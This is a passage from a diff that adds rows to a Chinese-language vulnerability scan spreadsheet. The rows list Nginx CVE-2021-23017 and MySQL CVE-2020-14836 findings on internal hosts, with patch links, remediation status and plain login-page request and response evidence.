+        </is>
+      </c>
+      <c r="N31" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O31" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P31" t="inlineStr"/>
+      <c r="Q31" t="inlineStr"/>
+      <c r="R31" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S31" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T31" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U31" t="inlineStr"/>
+      <c r="V31" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W31" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X31" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y31" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="32">
+      <c r="A32" t="inlineStr">
+        <is>
+          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+        </is>
+      </c>
+      <c r="B32" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C32" t="inlineStr">
+        <is>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D32" t="inlineStr"/>
+      <c r="E32" t="inlineStr">
+        <is>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+        </is>
+      </c>
+      <c r="F32" t="inlineStr">
+        <is>
+          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+        </is>
+      </c>
+      <c r="G32" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
+      <c r="H32" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I32" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J32" t="inlineStr">
+        <is>
+          <t>CVE-2021-23017</t>
+        </is>
+      </c>
+      <c r="K32" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:33</t>
+        </is>
+      </c>
+      <c r="L32" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:33</t>
+        </is>
+      </c>
+      <c r="M32" t="inlineStr">
+        <is>
+          <t>192.168.50.143</t>
+        </is>
+      </c>
+      <c r="N32" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O32" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P32" t="inlineStr"/>
+      <c r="Q32" t="inlineStr"/>
+      <c r="R32" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S32" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T32" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U32" t="inlineStr"/>
+      <c r="V32" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W32" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X32" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y32" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="33">
+      <c r="A33" t="inlineStr">
+        <is>
+          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+        </is>
+      </c>
+      <c r="B33" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C33" t="inlineStr">
+        <is>
+          <t>中危</t>
+        </is>
+      </c>
+      <c r="D33" t="inlineStr"/>
+      <c r="E33" t="inlineStr">
+        <is>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+        </is>
+      </c>
+      <c r="F33" t="inlineStr">
+        <is>
+          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+        </is>
+      </c>
+      <c r="G33" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
+      <c r="H33" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I33" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J33" t="inlineStr">
+        <is>
+          <t>CVE-2020-14836</t>
+        </is>
+      </c>
+      <c r="K33" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:33</t>
+        </is>
+      </c>
+      <c r="L33" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:33</t>
+        </is>
+      </c>
+      <c r="M33" t="inlineStr">
+        <is>
+          <t>192.168.50.143</t>
+        </is>
+      </c>
+      <c r="N33" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O33" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P33" t="inlineStr"/>
+      <c r="Q33" t="inlineStr"/>
+      <c r="R33" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S33" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T33" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U33" t="inlineStr"/>
+      <c r="V33" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W33" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X33" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y33" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="34">
+      <c r="A34" t="inlineStr">
+        <is>
+          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+        </is>
+      </c>
+      <c r="B34" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C34" t="inlineStr">
+        <is>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D34" t="inlineStr"/>
+      <c r="E34" t="inlineStr">
+        <is>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+        </is>
+      </c>
+      <c r="F34" t="inlineStr">
+        <is>
+          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+        </is>
+      </c>
+      <c r="G34" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
+      <c r="H34" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I34" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J34" t="inlineStr">
+        <is>
+          <t>CVE-2021-23017</t>
+        </is>
+      </c>
+      <c r="K34" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:25</t>
+        </is>
+      </c>
+      <c r="L34" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="M34" t="inlineStr">
+        <is>
+          <t>192.168.50.98</t>
+        </is>
+      </c>
+      <c r="N34" t="inlineStr">
+        <is>
+          <t>服务器</t>
+        </is>
+      </c>
+      <c r="O34" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P34" t="inlineStr"/>
+      <c r="Q34" t="inlineStr"/>
+      <c r="R34" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S34" t="inlineStr">
+        <is>
+          <t>退库资产</t>
+        </is>
+      </c>
+      <c r="T34" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U34" t="inlineStr"/>
+      <c r="V34" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W34" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X34" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y34" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="35">
+      <c r="A35" t="inlineStr">
+        <is>
+          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+        </is>
+      </c>
+      <c r="B35" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C35" t="inlineStr">
+        <is>
+          <t>中危</t>
+        </is>
+      </c>
+      <c r="D35" t="inlineStr"/>
+      <c r="E35" t="inlineStr">
+        <is>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+        </is>
+      </c>
+      <c r="F35" t="inlineStr">
+        <is>
+          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+        </is>
+      </c>
+      <c r="G35" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
+      <c r="H35" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I35" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J35" t="inlineStr">
+        <is>
+          <t>CVE-2020-14836</t>
+        </is>
+      </c>
+      <c r="K35" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:25</t>
+        </is>
+      </c>
+      <c r="L35" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="M35" t="inlineStr">
+        <is>
+          <t>192.168.50.98</t>
+        </is>
+      </c>
+      <c r="N35" t="inlineStr">
+        <is>
+          <t>服务器</t>
+        </is>
+      </c>
+      <c r="O35" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P35" t="inlineStr"/>
+      <c r="Q35" t="inlineStr"/>
+      <c r="R35" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S35" t="inlineStr">
+        <is>
+          <t>退库资产</t>
+        </is>
+      </c>
+      <c r="T35" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U35" t="inlineStr"/>
+      <c r="V35" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W35" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X35" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y35" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="36">
+      <c r="A36" t="inlineStr">
+        <is>
+          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+        </is>
+      </c>
+      <c r="B36" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C36" t="inlineStr">
+        <is>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D36" t="inlineStr"/>
+      <c r="E36" t="inlineStr">
+        <is>
